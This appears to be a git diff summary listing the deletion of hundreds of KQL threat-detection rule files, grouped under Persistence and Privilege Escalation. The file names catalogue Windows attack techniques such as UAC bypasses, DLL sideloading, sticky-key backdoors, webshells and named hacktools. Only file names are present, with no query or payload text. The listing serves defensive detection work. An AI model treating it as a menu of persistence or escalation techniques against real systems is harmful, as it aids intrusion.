Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql delete mode 100644 Persistence/Atbroker_Registry_Change.kql delete mode 100644 Persistence/Bypass_UAC_Using_Event_Viewer.kql delete mode 100644 Persistence/COM_Hijacking_via_TreatAs.kql delete mode 100644 Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql delete mode 100644 Persistence/Change_Default_File_Association_Via_Assoc.kql delete mode 100644 Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql delete mode 100644 Persistence/Chopper_Webshell_Process_Pattern.kql delete mode 100644 Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql delete mode 100644 Persistence/Classes_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Common_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Control_Panel_Items.kql delete mode 100644 Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql delete mode 100644 Persistence/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql delete mode 100644 Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql delete mode 100644 Persistence/CurrentControlSet_Autorun_Keys_Modification.kql delete mode 100644 Persistence/CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql delete mode 100644 Persistence/DLL_Load_via_LSASS.kql delete mode 100644 Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql delete mode 100644 Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Persistence/Direct_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Enable_Local_Manifest_Installation_With_Winget.kql delete mode 100644 
Persistence/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Persistence/Fax_Service_DLL_Search_Order_Hijack.kql delete mode 100644 Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql delete mode 100644 Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql delete mode 100644 Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql delete mode 100644 Persistence/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Persistence/HackTool_-_SharPersist_Execution.kql delete mode 100644 Persistence/IE_Change_Domain_Zone.kql delete mode 100644 Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql delete mode 100644 Persistence/Internet_Explorer_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Leviathan_Registry_Key_Activity.kql delete mode 100644 Persistence/MSExchange_Transport_Agent_Installation.kql delete mode 100644 Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Persistence/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Persistence/Modify_User_Shell_Folders_Startup_Value.kql delete mode 100644 Persistence/Narrator_s_Feedback-Hub_Persistence.kql delete mode 100644 Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql delete mode 100644 Persistence/New_Custom_Shim_Database_Created.kql delete mode 100644 Persistence/New_Kernel_Driver_Via_SC.EXE.kql delete mode 100644 Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql delete mode 100644 Persistence/New_ODBC_Driver_Registered.kql delete mode 100644 Persistence/New_Outlook_Macro_Created.kql delete mode 100644 Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql delete mode 100644 Persistence/New_Service_Creation_Using_PowerShell.kql delete mode 100644 
Persistence/New_Service_Creation_Using_Sc.EXE.kql delete mode 100644 Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql delete mode 100644 Persistence/New_User_Created_Via_Net.EXE.kql delete mode 100644 Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql delete mode 100644 Persistence/Office_Application_Startup_-_Office_Test.kql delete mode 100644 Persistence/Office_Autorun_Keys_Modification.kql delete mode 100644 Persistence/OilRig_APT_Registry_Persistence.kql delete mode 100644 Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql delete mode 100644 Persistence/Outlook_Security_Settings_Updated_-_Registry.kql delete mode 100644 Persistence/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Persistence/Path_To_Screensaver_Binary_Modified.kql delete mode 100644 Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql delete mode 100644 Persistence/Persistence_Via_Hhctrl.ocx.kql delete mode 100644 Persistence/Persistence_Via_New_SIP_Provider.kql delete mode 100644 Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql delete mode 100644 Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Persistence/Potential_7za.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql delete mode 100644 Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql delete mode 100644 Persistence/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql delete mode 100644 Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 
100644 Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Persistence/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql delete mode 100644 Persistence/Potential_Persistence_Using_DebugPath.kql delete mode 100644 Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql delete mode 100644 Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql delete mode 100644 Persistence/Potential_Persistence_Via_AutodialDLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql delete mode 100644 Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Via_DLLPathOverride.kql delete mode 100644 Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql delete mode 100644 Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Persistence/Potential_Persistence_Via_LSA_Extensions.kql delete mode 100644 Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql delete mode 100644 
Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql delete mode 100644 Persistence/Potential_Persistence_Via_Mpnotify.kql delete mode 100644 Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql delete mode 100644 Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Form.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql delete mode 100644 Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql delete mode 100644 Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql delete mode 100644 Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql delete mode 100644 Persistence/Potential_Persistence_Via_TypedPaths.kql delete mode 100644 Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql delete mode 100644 Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete 
mode 100644 Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql delete mode 100644 Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql delete mode 100644 Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql delete mode 100644 Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql delete mode 100644 Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql delete mode 100644 Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql delete mode 100644 Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql delete mode 100644 Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql delete mode 100644 Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Webshell_Creation_On_Static_Website.kql delete mode 100644 Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql delete mode 100644 Persistence/PowerShell_Module_File_Created.kql delete mode 100644 Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql delete mode 100644 Persistence/PowerShell_Profile_Modification.kql delete mode 100644 Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql delete mode 100644 Persistence/Powerup_Write_Hijack_DLL.kql delete mode 100644 Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Persistence/RDP_Sensitive_Settings_Changed.kql delete mode 100644 Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql delete mode 100644 
Persistence/Register_New_IFiltre_For_Persistence.kql delete mode 100644 Persistence/Registry_Modification_to_Hidden_File_Extension.kql delete mode 100644 Persistence/Registry_Persistence_via_Explorer_Run_Key.kql delete mode 100644 Persistence/Rundll32_Registered_COM_Objects.kql delete mode 100644 Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql delete mode 100644 Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql delete mode 100644 Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql delete mode 100644 Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql delete mode 100644 Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql delete mode 100644 Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql delete mode 100644 Persistence/ServiceDll_Hijack.kql delete mode 100644 Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Persistence/Session_Manager_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Persistence/Startup_Folder_File_Write.kql delete mode 100644 Persistence/Sticky_Key_Like_Backdoor_Execution.kql delete mode 100644 Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql delete mode 100644 Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql delete mode 100644 Persistence/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql delete mode 100644 Persistence/Suspicious_Debugger_Registration_Cmdline.kql delete mode 100644 Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql delete mode 100644 
Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql delete mode 100644 Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql delete mode 100644 Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql delete mode 100644 Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Persistence/Suspicious_File_Drop_by_Exchange.kql delete mode 100644 Persistence/Suspicious_Get-Variable.exe_Creation.kql delete mode 100644 Persistence/Suspicious_GrpConv_Execution.kql delete mode 100644 Persistence/Suspicious_IIS_Module_Registration.kql delete mode 100644 Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql delete mode 100644 Persistence/Suspicious_New_Service_Creation.kql delete mode 100644 Persistence/Suspicious_Outlook_Macro_Created.kql delete mode 100644 Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql delete mode 100644 Persistence/Suspicious_Process_By_Web_Server_Process.kql delete mode 100644 Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Persistence/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Persistence/Suspicious_Run_Key_from_Download.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql delete mode 100644 Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql delete mode 100644 Persistence/Suspicious_Screensaver_Binary_File_Creation.kql delete mode 100644 Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql delete mode 100644 Persistence/Suspicious_Service_Path_Modification.kql 
delete mode 100644 Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Persistence/Suspicious_Shim_Database_Patching_Activity.kql delete mode 100644 Persistence/Suspicious_Startup_Folder_Persistence.kql delete mode 100644 Persistence/Suspicious_WindowsTerminal_Child_Processes.kql delete mode 100644 Persistence/Suspicious_desktop.ini_Action.kql delete mode 100644 Persistence/Sysinternals_PsService_Execution.kql delete mode 100644 Persistence/Sysinternals_PsSuspend_Execution.kql delete mode 100644 Persistence/System_Scripts_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Tasks_Folder_Evasion.kql delete mode 100644 Persistence/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Persistence/UAC_Bypass_With_Fake_DLL.kql delete mode 100644 Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql delete mode 100644 Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql delete mode 100644 Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql delete mode 100644 Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql delete mode 100644 Persistence/Uncommon_Userinit_Child_Process.kql delete mode 100644 Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql delete mode 100644 Persistence/User_Added_To_Highly_Privileged_Group.kql delete mode 100644 Persistence/User_Added_to_Local_Administrators_Group.kql delete mode 100644 Persistence/User_Added_to_Remote_Desktop_Users_Group.kql delete mode 100644 Persistence/VBScript_Payload_Stored_in_Registry.kql delete mode 100644 Persistence/VMToolsd_Suspicious_Child_Process.kql delete mode 100644 Persistence/VsCode_Powershell_Profile_Modification.kql delete mode 100644 Persistence/WINEKEY_Registry_Modification.kql delete mode 100644 Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql delete mode 100644 Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql delete mode 100644 
Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql delete mode 100644 Persistence/WMI_Persistence_-_Script_Event_Consumer.kql delete mode 100644 Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql delete mode 100644 Persistence/Webshell_Detection_With_Command_Line_Keywords.kql delete mode 100644 Persistence/Webshell_Hacking_Activity_Patterns.kql delete mode 100644 Persistence/Webshell_Tool_Reconnaissance_Activity.kql delete mode 100644 Persistence/WinSock2_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql delete mode 100644 Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql delete mode 100644 Persistence/Winget_Admin_Settings_Modification.kql delete mode 100644 Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql delete mode 100644 Persistence/Winlogon_Notify_Key_Logon_Persistence.kql delete mode 100644 Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql delete mode 100644 Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql delete mode 100644 Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql delete mode 100644 Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql delete mode 100644 Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql delete mode 100644 Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql delete mode 100644 Privilege Escalation/Bypass_UAC_via_CMSTP.kql delete mode 100644 Privilege 
Escalation/Bypass_UAC_via_Fodhelper.exe.kql delete mode 100644 Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql delete mode 100644 Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 Privilege Escalation/COM_Hijack_via_Sdclt.kql delete mode 100644 Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql delete mode 100644 Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql delete mode 100644 Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_WinPwn_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_winPEAS_Execution.kql delete mode 100644 Privilege Escalation/Interactive_AT_Job.kql delete mode 100644 Privilege Escalation/LiveKD_Driver_Creation.kql delete mode 100644 Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql delete mode 100644 Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql delete mode 100644 Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql delete mode 100644 Privilege Escalation/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Privilege Escalation/Modify_Group_Policy_Settings.kql delete mode 100644 Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql delete mode 100644 Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql delete mode 100644 
Privilege Escalation/New_Service_Creation_Using_PowerShell.kql delete mode 100644 Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql delete mode 100644 Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql delete mode 100644 Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Privilege Escalation/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql delete mode 100644 Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql delete mode 100644 Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql delete mode 100644 Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql delete mode 100644 Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Privilege Escalation/Potential_7za.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql delete mode 100644 Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Privilege 
Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Privilege Escalation/Potential_EACore.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql delete mode 100644 Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql delete mode 100644 Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql delete mode 100644 Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql delete mode 100644 Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql delete mode 100644 Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql 
delete mode 100644 Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql delete mode 100644 Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql delete mode 100644 Privilege Escalation/PowerShell_Profile_Modification.kql delete mode 100644 Privilege Escalation/Powerup_Write_Hijack_DLL.kql delete mode 100644 Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql delete mode 100644 Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Privilege Escalation/Regedit_as_Trusted_Installer.kql delete mode 100644 Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql delete mode 100644 Privilege Escalation/Rundll32_Registered_COM_Objects.kql delete mode 100644 Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Privilege Escalation/Sdclt_Child_Processes.kql delete mode 100644 Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql delete mode 100644 Privilege Escalation/ServiceDll_Hijack.kql delete mode 100644 Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Privilege 
Escalation/Shell_Open_Registry_Keys_Manipulation.kql delete mode 100644 Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql delete mode 100644 Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql delete mode 100644 Privilege Escalation/Suspect_Svchost_Activity.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql delete mode 100644 Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql delete mode 100644 Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql delete mode 100644 Privilege Escalation/Suspicious_New_Service_Creation.kql delete mode 100644 Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql delete mode 100644 Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql delete mode 100644 Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql delete mode 100644 Privilege Escalation/Suspicious_Service_Path_Modification.kql delete mode 100644 Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql delete mode 100644 Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql 
